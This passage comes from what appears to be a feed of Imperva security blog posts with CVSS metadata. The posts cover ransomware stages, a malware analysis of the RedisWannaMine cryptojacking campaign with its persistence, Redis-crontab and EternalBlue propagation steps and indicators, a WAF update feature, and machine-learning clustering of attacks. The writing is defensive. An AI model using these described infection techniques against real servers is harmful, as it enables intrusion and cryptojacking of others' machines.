success.\n 4. Unpatched servers and databases provide the resident attacker room to operate freely within the company's network for a protracted amount of time.\n 5. In almost all these attacks, the intruders were in the company\u2019s environment for months, customizing their attack tools over and over again until the sensitive data was successfully compromised.\n\n### Ransomware attack\n\nThis type of attack is designed to disable critical systems or prevent sensitive data access by privileged users until a specified amount of money is paid. Ransomware attacks have become more and more sophisticated. They typically involve:\n\n1\\. Penetrating the organization's IT environment\n\n * Malware installed on an endpoint operating system via a phishing attack.\n * Account Takeover (ATO) attacks use stolen credentials to penetrate the organization\u2019s environment.\n\n2\\. Analyzing network resources to allocate databases that hold personal, financial, or business-critical information.\n\n3\\. Making the original data stored unusable by:\n\n * Encrypting the data.\n * Extract data either to a hidden file in the network or outside.\n * Modify data values stored.\n\n### Ransomware attack detection example\n\nIn this attack, the data is moved from the original database to a readme file.\n\nDB breach flow:\n\n 1. Attacker query for databases list.\n 2. Attacker selects prod_db.\n 3. Data is being stolen from prod_db using the 'select'.\n 4. Prod_db is being deleted using 'drop'.\n\n## How should organizations protect their home environment\n\nImperva research shows that much like using a safe at home, when organizations secure their data repositories with a data-centric security fabric, and when a hostile penetration occurs, they dramatically reduce data exfiltration risk by turning all open repositories into well protected alarmed enabled safes. This shortens the path from breach to detection to response.\n\nAs business innovation and the services that support it are digitally transformed, the perimeter boundaries have blurred. The \u201cwalls\u201d that protect data repositories have cracks that allow attackers to put their hands on sensitive data, effectively ending the days of protecting assets within the network perimeter. The security of an organization is only as strong as the weakest link in the security chain. In many cases, better architecture and cross-organization security practices would do the trick, but those practices are not easy to implement and control, nor do they account for the risks presented by third-party technology providers. You must secure all the data repositories they manage, not just the applications and networks that surround them.\n\nThe cause of most breaches is the lack of an in-depth data security strategy. As we discussed before, you can reduce the attack surface by securing your data repositories, but you must gain visibility into them. Next, eliminate excessive privileges from key users and deploy strong authentication mechanisms. Never forget that securing data repositories is a never-ending process, you must always work toward optimizing your security architecture, policies, and practices, both for your assets and employees. Continuously performing data discovery and classification to locate sensitive personal data is a great way to maintain an enterprise-grade data security strategy and eliminate bad practices inside on-premises and cloud-managed environments. Together with implementing [Imperva\u2019s Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) (WAF) and [Imperva Data Security Fabric](<https://www.imperva.com/products/data-security-fabric/>), it is possible to protect against most potential data breach scenarios.\n\n## On-Demand Webinar: Detecting Attacks on Your Data. How can we do it right?\n\n[Watch now.](<https://community.imperva.com/events/event-description?CalendarEventKey=afb10612-12cf-4e6d-9fe6-b3a4486a966f&CommunityKey=39c6092a-d67a-4bc2-8134-bfbb25fc43af&Home=%2fevents>)\n\nSecurity Analytics are an essential part of the toolkit to protect against data breaches. Are you using Imperva Data Risk Analytics (DRA)? Imperva Data Risk Analytics tools have been purpose-built to recognize threats such as suspicious data access or signs of potentially compromised accounts. But did you know Imperva recently added new features that can recognize the attack signatures of active exploits so you can be instantly notified of an attack in progress?\n\nIn this webinar, Product Manager Oren Graiver, will describe how you can use [Imperva Data Risk Analytics](<https://www.imperva.com/solutions/user-behavior-analytics/>) to augment Imperva vulnerability assessment and data activity monitoring and transform your security posture to proactively prevent data compromise incidents. Topics covered will include:\n\n * Where breaches are found\n * Understanding data breach detection\n * Early signs of a breach\n * Kill chain and data compromise\n * Real life example of a breach DRA can detect - Ransomware\n * What\u2019s on the roadmap?\n\n[Watch the webinar today](<https://community.imperva.com/events/event-description?CalendarEventKey=afb10612-12cf-4e6d-9fe6-b3a4486a966f&CommunityKey=39c6092a-d67a-4bc2-8134-bfbb25fc43af&Home=%2fevents>).\n\nThe post [Two New Trends Make Early Breach Detection and Prevention a Security Imperative](<https://www.imperva.com/blog/two-new-trends-make-early-breach-detection-and-prevention-a-security-imperative/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-31T13:47:34", "type": "impervablog", "title": "Two New Trends Make Early Breach Detection and Prevention a Security Imperative", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2022-08-31T13:47:34", "id": "IMPERVABLOG:CD196CDD794CCCE3719A9D38DA5BE417", "href": "https://www.imperva.com/blog/two-new-trends-make-early-breach-detection-and-prevention-a-security-imperative/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-03-08T20:51:51", "description": "Recently cryptojacking attacks have been spreading like wildfire. At Imperva we have witnessed it firsthand and even concluded that these attacks [hold roughly 90% of all remote code execution attacks in web applications](<https://www.imperva.com/blog/2018/02/new-research-crypto-mining-drives-almost-90-remote-code-execution-attacks/>).\n\nHaving said that, all of the attacks we have seen so far, were somewhat limited in their complexity and capability. The attacks contained malicious code that downloaded a cryptominer executable file and ran it with a basic evasion technique or none at all.\n\nThis week we saw a new generation of cryptojacking attacks aimed at _both_ database servers and application servers. We dubbed one of these attacks _RedisWannaMine._\n\n_RedisWannaMine_ is more complex in terms of evasion techniques and capabilities. It demonstrates a worm-like behavior combined with advanced exploits to increase the attackers\u2019 infection rate and fatten their wallets.\n\n[![](https://www.imperva.com/blog/wp-content/uploads/2018/03/Screen-Shot-2018-03-08-at-7.43.49-AM.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/Screen-Shot-2018-03-08-at-7.43.49-AM.png>)\n\nIn a nutshell, **cryptojacking attackers have upped their game and they are getting crazier by the minute!**\n\n## Cryptojacking 2.0/ RedisWannaMine\n\nImperva deploys a network of sensors to gather security intelligence. These sensors are deployed in publicly accessible databases and web servers. This week we recorded an interesting remote code execution (RCE) attack through our web application sensors. When we record an RCE attack that tries to download an external resource, we try to probe the remote host to gain further security information. This was the case this week when our sensors recorded the following attack vector that tried to exploit [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>):\n\n[![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic1.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic1.png>)\n\nWhen we probed the remote server we found a list of suspicious files:\n\n[![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/Picture2-300x202.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/Picture2.png>)\n\nThe list includes known malicious files, like _minerd, _but also some unknown suspicious files like _transfer.sh._\n\nWhen we submitted _transfer.sh_ hash to Virus Total, we found it is fairly new, the first submission in 2018-03-05 and detected only by 10 engines:\n\n![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic3-300x227.png)\n\nThis shell script file is a downloader that is similar in some ways to older cryptojacking downloaders we know:\n\n * It downloads a crypto miner malware from an external location\n * It gains persistency in the machine through new entries in _crontab_\n * It gains remote access to the machine through a new ssh key entry in _/root/.ssh/authorized_keys _and new entries in the system\u2019s _iptables_\n\nHowever, this downloader is unlike any downloader we\u2019ve seen before. In the following sections, we will list the new capabilities it offers.\n\n## Self-sufficient\n\nThe script installs a lot of packages using Linux standard package managers like _apt _and _yum_. This is probably to make sure it is self-sufficient and does not need to depend on local libraries in the victim\u2019s machine. As a hint to things to follow we saw it installs packages like _git, python, redis-tools, wget, gcc_ and _make_.\n\n## [![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic4-300x111.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic4.png>)\n\n## Github integration\n\nThe script downloads a publicly available tool, named _masscan_, from a Github repository, then compiles and installs it.\n\n[![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic5-300x17.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic5.png>)\n\nThe project page <https://github.com/robertdavidgraham/masscan> describes it as \u201cTCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.\u201d\n\nAlso, it offers simple usage examples:\n\n## [![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic6-300x73.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic6.png>)\n\n## Redis scan and infection\n\nThe script then launches another process named \u201c_redisscan.sh_\u201d. The new process uses the _masscan_ tool mentioned above to discover and infect publicly available Redis servers. It does so by creating a large list of IPs, **internal** and **external** and scanning port 6379 which is the default listening port of Redis.\n\n[![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic7.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic7.png>)\n\nIf one of the IPs in the list is publicly available, the script launches the \u201c_redisrun.sh_\u201d process to infect it with the same crypto miner malware (\u201c_transfer.sh_\u201d). The infection is done using _redis-cli_ command line tool, that the downloader previously installed, that runs the \u201c_runcmd_\u201d payload.\n\n[![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic8-300x37.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic8.png>)\n\n\u201c_runcmd_\u201d is a 10-line Redis command script that creates new entries in the Redis server crontab directory and thus infects the server and gains persistency in case someone notices the malware and deletes it.\n\n[![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic9-300x42.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic9.png>)\n\nNotice that the attacker uses line feeds, \u201c_\\n_\u201d, at the beginning and at the end of each key value. If you run these commands in a Redis server, a file with the following content will be created:\n\n## [![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic10-300x49.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic10.png>)\n\n## SMB scan and infection\n\nAfter the script completed the Redis scan, it launches another scan process named \u201c_ebscan.sh_\u201d. This time the new process uses the _masscan_ tool to discover and infect publicly available Windows servers with the vulnerable SMB version. It does so by creating a large list of IPs, **internal** and **external**, and scanning port 445 which is the default listening port of SMB.\n\n[![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic11.1.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic11.1.png>)\n\n[![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic11.2-300x92.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic11.2.png>)\n\nIn case you\u2019ve been living under a rock, the SMB vulnerability this script is scanning for, was used by the NSA to create the infamous \u201c_Eternal Blue_\u201d exploit. This exploit was later on adapted to carry out \u201c_WannaCry_\u201d, one the biggest cyberattacks in the world.\n\nWhen the script finds a vulnerable server, it launches the \u201c_ebrun.sh_\u201d process to infect it.\n\n\u201c_ebrun.sh_\u201d runs a Python implementation of the aforementioned \u201c_Eternal Blue_\u201d exploit and drops the file \u201c_x64.bin\u201d _in the vulnerable machine.\n\n[![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic12-300x60.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic12.png>)\n\nWe used the _strings_ command to print all the strings of printable characters in the file and found a code that creates a malicious VBScript file named \u201c_poc.vbs_\u201d and runs it.\n\n\u201c_poc.vbs_\u201d downloads an executable from an external location, saves it in the vulnerable server as \u201c_admissioninit.exe_\u201d and runs it. Needless to say, \u201c_admissioninit.exe\u201d _is a well-known crypto miner malware.\n\n[![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic13-300x87.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic13.png>)\n\n## What should I do?\n\n * Protect your web applications and databases. The initial attack vector was introduced through a web application vulnerability. A properly patched application or an application protected by a WAF should be safe.\n * Make sure you don\u2019t expose your Redis servers to the world. This can be achieved with a simple firewall rule.\n * Make sure you don\u2019t run machines with the vulnerable SMB version in your organization. You can use [this](<http://omerez.com/eternalblues/>) awesome tool to do check it\n\n## IOC\n\n**Hosts:**\n\nhttp://ipfs.io/\n\nhttp://admission.fri3nds.in/\n\n**IPs:**\n\n147.135.130.181\n\n217.182.195.23\n\n**Files:**\n\n615f70c80567aab97827f1a0690987061e105f004fbc6ed8db8ebee0cca59113 transfer.sh\n\n260ef4f1bb0e26915a898745be873373f083227a4f996731f9a3885397a49e79 clay\n\n2d89b48ed09e68b1a228e08fd66508d349303f7dc5a0c26aa5144f69c65ce2f2 minerd\n\neb010a63650f4aa58f58a66c3082bec115b2fec5635fa856838a43add059869d admission.exe\n\nf8428b0ceb5eaf1e496d79824a9c2b6c685fdeb2ddc36b036748ea71b15a5d79 xmr-32.exe\n\ne1c9ffc6677c7c2a6edec5d47bdff5e572d8fdf57675c41ff9e63a8c20bb18db xmr-64.exe\n\ncdadd649c42d28264277dd8edd5b6de23c8070fbf7b5a5ecdcbe03d99613efba ebrun.sh\n\nb2f5abb708c3481ad69aa459e3107c892bceafd26122129c84338cac92bf4797 ebscan.sh\n\n99a4ded26895422707f7c92eca9c9d64212cc033c50010fb027fe32ab55386d9 eternalblue_exploit7.py\n\n34022a65a3eb93b109ed4c6e1233c6404197818a70f51ab654e2c7e474ee2539 eternalblue_exploit8.py\n\n9040274f28d8dbe9e2372fec6482964fa2de8a790c818a3238d0af5fda6c3dbf order.py\n\nc7ed3da4e8d29474909bb0c57e788799fbd3ff96a00e2a0d8f752ed494b9773f rangeip.py\n\ne74e8b14e00de1cdf14d885e3b8a85d33e33e0b239e202243fc4edeeb84a1325 redisrun.sh\n\n794a891cae3374bf28c78eeb3ca39bd59f6ed927f28477561cc0fd11909f34fb redisscan.sh\n\n1bca0088f84d9642002e8d403efb77f75596a9d9c50f171e587a66cc804fa971 runcmd\n\ne3d2088d0cf68efe57babddd7a6973ca5187a127f5e8932436a781391de0320c x64.bin", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-08T18:45:38", "type": "impervablog", "title": "RedisWannaMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9805"], "modified": "2018-03-08T18:45:38", "id": "IMPERVABLOG:38007E943B20A50B729BC17911999C11", "href": "https://www.imperva.com/blog/2018/03/rediswannamine-new-redis-nsa-powered-cryptojacking-attack/", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-26T20:41:18", "description": "We previously reported that the overall number of new web application vulnerabilities in 2017 showed a 212% increase from 2016\u2019s 6,615 to a whopping 14,082. This spike was due, in part, to high-profile vulnerabilities like Heartbleed, Shellshock, POODLE, Apache Struts 2 and more recently, Meltdown and Spectra.\n\nThere is, however, good news in the form of a new tool tasked with pushing mitigations for high-profile vulnerabilities like these to the SecureSphere [Web Application Firewall (WAF)](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>) within a matter of hours.\n\n## Ongoing Vulnerability Protection\n\nTasking your security team with analyzing each and every vulnerability, deciding their relevance and applying the necessary mitigations is near impossible, which is why [virtual patching of your WAF](<https://www.imperva.com/blog/2017/03/deploy-instant-virtual-patching-on-securesphere-waf-with-highly-accurate-web-vulnerability-data/>) is so important. Not updating your WAF regularly is like wearing your old 80s jeans thinking you\u2019re still cool\u2026you\u2019re not. Imperva regularly releases mitigations for new vulnerabilities.\n\n> In today\u2019s tech landscape, where constantly up-leveled cyberattacks are one of the most prominent threats to corporate assets, timing is everything.\n\nOnce a [vulnerability is published](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) it\u2019s only a matter of time until attackers will exploit it. It only takes a few hours for high-quality code snippets to be published and by then, every script-kiddy has had the opportunity to run them against whomever they choose. In the case of a [2017 Apache Struts vulnerability](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>), for example, an official exploit was made public one day after the vulnerability was announced. Clearly, updating mitigations only once every few weeks is not enough.\n\n## The Answer: An Emergency Feed\n\nImperva has incorporated an emergency feed into our ThreatRadar subscription service as an extension of our WAF, which allows Imperva security researchers to push mitigations for high-profile vulnerabilities to the WAF in just a matter of hours. Our goal is to push mitigations via the emergency feed in no less than 24 hours from the time of the vulnerability\u2019s publication, so whether a new vulnerability hits the landscape in the middle of the night or your entire security team is on vacation, your WAF estate is protected.\n\n## So, how do we do it?\n\nTo apply mitigation through the emergency feed, a vulnerability must be remotely exploited, operational without authentication and have the potential to be highly impactful. In these cases, Imperva researchers analyze the vulnerability, understand its scope, and create the appropriate mitigation. The mitigation is then run through a wide set of Incapsula and SecureSphere customers, on real-world data, to observe its false positive rate and search for the vulnerabilities\u2019 variations. Only when our researchers are convinced that the new mitigation is stable and reliable will they push it into the emergency feed.\n\nSimply put, in just a few hours, all of Imperva\u2019s customers on Incapsula and SecureSphere WAFs are fully protected. The best part? There\u2019s no action required by your in-house security team. As soon as they\u2019re back in the office they have access to a report summarizing the nature of the vulnerability and the mitigation applied.\n\n## Included with ThreatRadar Subscription\n\nIf you\u2019re a SecureSphere customer with a [ThreatRadar](<https://www.imperva.com/products/threatradar-intelligence/>) subscription, the emergency feed is included and takes only a few clicks to enable. Incapsula customers receive this service out of the box \u2013 no registration required.\n\nFor SecureSphere customers with ThreatRadar subscription:\n\n 1. Check the **Emergency Feed** box on the customer portal to register.\n\n[![](https://www.imperva.com/blog/wp-content/uploads/2018/04/Emergency-Feed-1.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/04/Emergency-Feed-1.png>)\n\n 1. In the Imperva SecureSphere WAF dashboard, enable the **Emergency Feed services** under the ThreatRadar tab.\n\n[![](https://www.imperva.com/blog/wp-content/uploads/2018/04/Emergency-Feed-2.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/04/Emergency-Feed-2.png>)\n\nThat\u2019s it. The emergency feed is enabled and will begin receiving new mitigations immediately. With each content update, our researchers will remove the most recent mitigations from the emergency feed and permanently add them to your SecureSphere WAF, so your system is updated. You will be notified of updates via email.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-04-26T19:01:59", "type": "impervablog", "title": "Keeping Your WAF Relevant: Emergency Feed Pushes New Mitigations in Just Hours", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-04-26T19:01:59", "href": "https://www.imperva.com/blog/2018/04/keeping-waf-relevant-emergency-feed-pushes-new-mitigations-just-hours/", "id": "IMPERVABLOG:5E50E2263AEAFE98B90E01B16AA73334", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-06-20T00:15:21", "description": "In the previous blog posts in this series, we discussed the motivation for clustering attacks and the data used and how to calculate the distance between two attacks using different methods on each feature we extracted. In this final blog post, we\u2019ll discuss the clustering algorithm itself \u2013 how to use the distance we calculated to create clusters from the data. We will discuss clustering in real time when only a small amount of data can be stored in memory. Finally, we\u2019ll show some results of the algorithm based on real data from Imperva customers.\n\n## Choosing a (realtime) clustering algorithm\n\nNow we have all the basic ingredients to input into the algorithm. What\u2019s left to decide is which clustering algorithm to use. There are many algorithms to choose from that meet varying needs, for example, we\u2019ve previously written about [clustering](<https://www.imperva.com/blog/2017/07/clustering-and-dimensionality-reduction-understanding-the-magic-behind-machine-learning/>) techniques used in Imperva CounterBreach.\n\nHere\u2019s where the algorithm reality punched us right in the face: the demand from our engineering team was that the **clustering is done in** **real time**. Meaning each time a new event enters the system the algorithm needs to decide on the spot how to cluster it and update the current clustering state. This had been done with minimum memory, which meant that individual events could not be stored in memory.\n\nThe more popular and well-known clustering algorithms work on a batch of data instead of a stream, i.e., their input is a static dataset. So, this real-time requirement meant we had to look for other algorithms that work in streaming mode.\n\nThere are a [couple of methods](<https://en.wikipedia.org/wiki/Data_stream_clustering>) to use to cluster a stream of data. We won\u2019t discuss these methods as they are more complex and technical, instead, we\u2019ll present the requirements of our algorithm and what was needed for them to be met.\n\n## Clustering requirements in streaming mode\n\nFirst, a clustering algorithm in streaming mode needs to make decisions in real time, meaning that the algorithm maintains in memory a current state of the clusters and each time a new event enters the system the algorithm updates the clustering state. This is done instantaneously and without storing the discrete event in memory.\n\nSecond, we need to remember that each time the algorithm was making a decision it was doing so based on partial data. That\u2019s because the algorithm only processed past data. If the algorithm were to know **all **of the events (past and future events) the decision it would make might be different. So, the algorithm must have a way to **undo decisions** it made in the past. The way the algorithm undoes its decisions is by splitting a cluster into smaller parts and merging the parts together into other clusters that are the best fit.\n\nFinally, most of the streaming clustering algorithms from academic articles work on spatial data. This means that their input are points in a Euclidean space (think of it as coordinates in an n-dimensional space). Our data is more complex, it contains URLs which are strings, IPs, geographic coordinates and other varying features. These features cannot be easily embedded into a Euclidean space, and even if they would it would make no sense to do so. So, the algorithm we needed must assume only that we can calculate the distance between two data points, and not that they are embedded into a Euclidean space.\n\nWe used a homegrown algorithm to answer these needs. Clustering in streaming mode is always a trade-off between accuracy of the results and the time and memory efficiency. We tried to find the balance so the result would be as accurate as possible storing only the minimum amount of data needed in memory while performing the least possible amount of calculations with each incoming event. See Figure 7 for the general flow of clustering in streaming mode.\n\n[![](https://www.imperva.com/blog/wp-content/uploads/2018/05/Clustering.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/05/Clustering.png>)\n\nFigure 7: Clustering in streaming mode - clusters may change due to new events entering the system\n\nWe stored aggregated structured data in memory instead of raw events; this way we were able to split clusters, to some extent, and rearrange them as would seem most appropriate. Also, in order to process data in real time, most of the time we used a light-weight distance function that wouldn\u2019t take too much time to calculate and didn\u2019t consider all the features. We used a heavier and more accurate distance function that considered all the features only at predefined times when there were enough new events that entered the system, as we expected the clustering state might change significantly.\n\nAlso, for performance considerations, we couldn\u2019t cluster all the events from the beginning each time a new event entered the system. That\u2019s why every time a new event came in the algorithm used its current clustering state to do calculations only on the clusters that may change due to the new event. This way we significantly reduced the time it took to process each new event.\n\n## Results of the algorithm: Customer use cases\n\nFor validation of the algorithm, some of our web application firewall (WAF) customers provided us with logs containing events from their WAF. Here are three highlighted clusters which contain incidents we thought were interesting:\n\n### Nginx integer overflow\n\nCVE-2017-7529 is a vulnerability of Nginx that allows an attacker to launch an integer overflow attack using a crafted \u201crange\u201d header. We saw a cluster on a customer\u2019s WAF containing over two thousand attacks from over 100 distinct IPs over a period of three days trying to exploit this vulnerability. Over 80% of the attacks came from the US and most of the attacks seemed to use the same attack tool. Also, the attack targeted many different URLs, although it targeted only two resource extensions: PDF and CFM.\n\n### Email harvesting\n\nEmail collector robots try to scrape web applications to find email addresses. The purpose for email harvesting is mostly to collect lists of emails in order to sell them to spammers. We saw a cluster on a customer\u2019s WAF which contained over 50 distinct IPs that performed email harvesting. The source of these attacks was very distributed, from the US, Europe, South America and Asia. Most of the targets were the home page of the application. This means that after the robots were blocked at the home page they didn\u2019t proceed to scrape the rest of the site, probably moving on to try other websites which are not protected by a WAF. The same cluster was also found in more than five different web applications we analyzed indicating this is a popular attack.\n\n### Attacks on Apache Struts vulnerabilities\n\nIn [previous blog posts](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) we discussed Apache Struts vulnerabilities, and how they are very popular among attackers, especially ones from Asian countries. [CVE-2017-5638](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) is an Apache Struts vulnerability published on March 2017 that allows attackers to launch remote code execution attacks using a crafted \u201ccontent-type\u201d header. We saw a cluster of attacks trying to utilize this vulnerability; most of the attacks came from China and the target was very distributed, containing multiple URLs. Also, in addition to this specific vulnerability, the attackers tried to utilize other vulnerabilities of Apache Struts. This is a popular phenomenon we see in our data: attackers trying to utilize different vulnerabilities of the same system, in this case Apache Struts. The cluster appeared on over ten different web applications we analyzed, and all the clusters contained similar attributes. This indicates the popularity of Apache Struts vulnerabilities among attackers.\n\n## Conclusion\n\nClustering application attacks is a challenging task that requires a lot of research and experimentation. Throughout the process, we encountered many difficulties and made a number of decisions regarding the algorithm. Many due to real life constraints not seen in academic research. Customer applications don\u2019t live in a lab so the solutions that protect them can\u2019t either.\n\nKnowledge of the application security domain and a deep understanding of data are both \u2013 in our experience \u2013 crucial prerequisites for the design and implementation of any successful machine learning algorithm built to protect apps and the data that connects to them.\n\nLearn more about protecting apps from attacks with [Imperva SecureSphere](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>) or [Imperva Incapsula](<https://www.incapsula.com/website-security/web-application-firewall.html>) Web Application Firewall.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-06-19T22:41:03", "type": "impervablog", "title": "Clustering App Attacks with Machine Learning Part 3: Algorithm Results", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-7529"], "modified": "2018-06-19T22:41:03", "id": "IMPERVABLOG:697E34BE77BECD65BF763ECF92DD1B9F", "href": "https://www.imperva.com/blog/2018/06/clustering-app-attacks-with-machine-learning-part-3-algorithm-results/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-14T02:18:38", "description": "On July 7th, a new security vulnerability was published in Apache Struts 2 CVE-2017-9791 (S2-048[1]). Struts 2.3.x users with Struts 1 plugin, which includes the Showcase app, are vulnerable.\n\nOnce 